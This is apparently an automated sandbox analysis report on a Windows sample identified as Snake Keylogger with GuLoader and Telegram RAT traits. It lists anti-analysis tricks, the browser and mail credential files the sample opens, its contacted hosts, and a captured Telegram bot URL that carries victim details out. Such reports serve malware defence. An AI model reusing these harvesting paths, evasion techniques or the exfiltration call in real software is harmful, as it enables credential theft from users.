Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595967 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595859 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595750 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595516 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595391 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595281 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595172 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594938 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594813 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594469 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594359 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594250 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594141 Jump to behavior
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWhMw
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: C:\Users\user\Desktop\Fa24c148.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Fa24c148.exe API call chain: ExitProcess graph end node
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
Enables debug privileges
Source: C:\Users\user\Desktop\Fa24c148.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Fa24c148.exe Process created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Users\user\Desktop\Fa24c148.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_00405D99 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405D99
Source: C:\Users\user\Desktop\Fa24c148.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: Fa24c148.exe PID: 1440, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Fa24c148.exe PID: 1440, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: Fa24c148.exe PID: 1440, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543766 Sample: Fa24c148.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 17 reallyfreegeoip.org 2->17 19 api.telegram.org 2->19 21 4 other IPs or domains 2->21 29 Found malware configuration 2->29 31 Multi AV Scanner detection for submitted file 2->31 33 Yara detected GuLoader 2->33 39 3 other signatures 2->39 7 Fa24c148.exe 3 45 2->7         started        signatures3 35 Tries to detect the country of the analysis system (by using the IP) 17->35 37 Uses the Telegram API (likely for C&C communication) 19->37 process4 file5 15 C:\Users\user\AppData\Local\...\System.dll, PE32 7->15 dropped 41 Tries to detect virtualization through RDTSC time measurements 7->41 43 Switches to a custom stack to bypass stack traces 7->43 11 Fa24c148.exe 15 8 7->11         started        signatures6 process7 dnsIp8 23 api.telegram.org 149.154.167.220, 443, 49772 TELEGRAMRU United Kingdom 11->23 25 reallyfreegeoip.org 188.114.97.3, 443, 49739, 49740 CLOUDFLARENETUS European Union 11->25 27 3 other IPs or domains 11->27 45 Tries to steal Mail credentials (via file / registry access) 11->45 47 Tries to harvest and steal browser information (history, passwords, etc) 11->47 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
142.250.185.206
 drive.google.com United States
15169 GOOGLEUS false
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
142.250.186.65
 drive.usercontent.google.com United States
15169 GOOGLEUS false
132.226.247.73
 checkip.dyndns.com United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
drive.google.com 142.250.185.206 true
drive.usercontent.google.com 142.250.186.65 true
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.247.73 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2028/10/2024%20/%2022:44:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    https://reallyfreegeoip.org/xml/155.94.241.188 false
      		unknown